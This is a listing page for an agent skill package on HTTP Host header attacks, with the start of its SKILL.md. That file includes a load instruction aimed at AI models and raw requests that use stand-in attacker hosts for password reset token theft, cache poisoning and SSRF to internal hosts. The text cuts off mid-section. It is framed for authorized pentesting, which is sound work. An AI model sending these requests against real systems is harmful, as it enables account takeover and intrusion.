
Http Host Header Attacks
Test and exploit Host-header trust in web apps for reset poisoning, cache abuse, SSRF routing, and vhost bypass during security review.
Overview
HTTP Host Header Attacks is an agent skill for the Ship phase that guides Host-header injection for password reset poisoning, cache poisoning, SSRF via routing, and virtual host bypass.
Install
npx skills add https://github.com/yaklang/hack-skills --skill http-host-header-attacks
What is this skill?
- Password reset poisoning and URL generation abuse via trusted Host
- Web cache poisoning and virtual host bypass patterns
- SSRF and internal routing when the Host header steers backends
- Bypass patterns for Host validation and framework-specific behaviors
- Explicit cross-links to cache deception, SSRF, smuggling, and WAF bypass skills
Adoption & trust: 1.1k installs on skills.sh; 980 GitHub stars; 1/3 security scanners passed (skills.sh audits).
What problem does it solve?
Your app or proxy trusts the Host header for URLs or routing, and you need a systematic test plan for poisoning and bypass—not a single remembered payload.
Who is it for?
Authorized pentests and pre-launch reviews of multi-tenant SaaS, PHP/Laravel-style apps, and CDN-fronted APIs with custom Host handling.
Skip if: Teams with no HTTP surface, or anyone testing production systems without permission.
When should I use this skill?
Use when the application trusts the Host header for generating URLs, routing requests, or access control—enabling password reset poisoning, web cache poisoning, SSRF via routing, and virtual host bypass.
What do I get? / Deliverables
You follow a structured attack-surface and bypass checklist and can chain into linked skills when Host abuse enables cache, SSRF, or smuggling follow-ons.
- Documented Host injection test cases and observed framework behavior
- Findings report with chain paths to cache, SSRF, or redirect impact
Journey fit
Host-header abuse is exercised during Ship when hardening or pentesting URL generation, reverse proxies, and routing before production exposure. Security subphase is the canonical home for injection and routing abuse playbooks against live HTTP stacks.
How it compares
Procedural web-appsec skill package, not an automated scanner or MCP server.
Common Questions / FAQ
Who is http-host-header-attacks for?
Indie and solo builders shipping web apps who run their own security passes or bug-bounty-style checks on Host-dependent routing and URL builders.
When should I use http-host-header-attacks?
During Ship security when reset links, canonical URLs, cache keys, or reverse-proxy vhosts read Host; also when investigating suspected cache or SSRF issues tied to Host.
Is http-host-header-attacks safe to install?
The skill teaches offensive patterns; check Security Audits on this page and restrict use to environments you own or are contracted to test.
SKILL.md
# SKILL: HTTP Host Header Attacks — Injection & Routing Abuse

> **AI LOAD INSTRUCTION**: Covers Host header injection for password reset poisoning, cache poisoning, SSRF via routing, and virtual host bypass. Includes bypass techniques for Host validation and framework-specific behaviors. Base models often miss the double-Host trick, absolute-URI override, and connection-state attacks.

## 0. RELATED ROUTING

- [web-cache-deception](../web-cache-deception/SKILL.md) when Host injection is combined with cache behavior
- [ssrf-server-side-request-forgery](../ssrf-server-side-request-forgery/SKILL.md) when Host header routes requests to internal services
- [open-redirect](../open-redirect/SKILL.md) when Host injection causes redirect to attacker domain
- [waf-bypass-techniques](../waf-bypass-techniques/SKILL.md) when Host manipulation helps bypass WAF routing
- [request-smuggling](../request-smuggling/SKILL.md) when smuggling enables Host header manipulation past front-end validation
- [subdomain-takeover](../subdomain-takeover/SKILL.md) when Host routing exposes internal vhosts resolvable via subdomain

---

## 1. ATTACK SURFACE

The Host header is used by web applications and infrastructure for:

| Usage | Exploitation |
|---|---|
| URL generation (password reset links, email links) | Inject attacker domain → user clicks link to attacker |
| Virtual host routing | Spoof Host → access internal/admin vhost |
| Cache key component | Inject different Host → poison cache for all users |
| Reverse proxy routing | Host determines backend → SSRF to internal services |
| Access control decisions | Host-based ACLs can be bypassed |
| Canonical URL / SEO redirects | Host injection → open redirect |

---

## 2. PASSWORD RESET POISONING

The most common and impactful Host header attack.

### How It Works

```
1. Attacker requests password reset for victim@target.com

2. Attacker modifies Host header in the reset request:
   POST /forgot-password HTTP/1.1
   Host: attacker.com          ← injected

   email=victim@target.com

3. Server generates reset link using Host header value:
   "Click here to reset: https://attacker.com/reset?token=SECRET_TOKEN"

4. Victim receives email, clicks link → token sent to attacker

5. Attacker uses token on real target.com to reset password
```

### Testing

```http
POST /forgot-password HTTP/1.1
Host: attacker-collaborator.burpcollaborator.net
Content-Type: application/x-www-form-urlencoded

email=victim@target.com
```

Check Burp Collaborator for incoming HTTP request with the reset token.

### Variants

- Some apps concatenate: `Host: target.com.attacker.com` → link becomes `https://target.com.attacker.com/reset?token=xxx`
- Some apps use only the port portion: `Host: target.com:@attacker.com` → parsed as `attacker.com` in some URL parsers

---

## 3. WEB CACHE POISONING VIA HOST

```
1. Attacker sends:
   GET / HTTP/1.1
   Host: attacker.com

2. If cache keys on URL path but NOT on Host header:
   → Response cached with attacker.com in generated links/content

3. Subsequent users requesting GET / receive the poisoned response
   → Links point to attacker.com, scripts load from attacker.com
```

**Key requirement**: Cache must not include Host header in cache key, but application must use Host in response body. Test by sending two requests with different Host values and checking if the second request returns the first's Host in the response.

---

## 4. SSRF VIA HOST ROUTING

When a reverse proxy uses Host header to route to backends:

```
GET /api/internal HTTP/1.1
Host: internal-admin-panel.local

→ Reverse proxy routes request to internal-admin-panel.local
→ Attacker accesses internal serv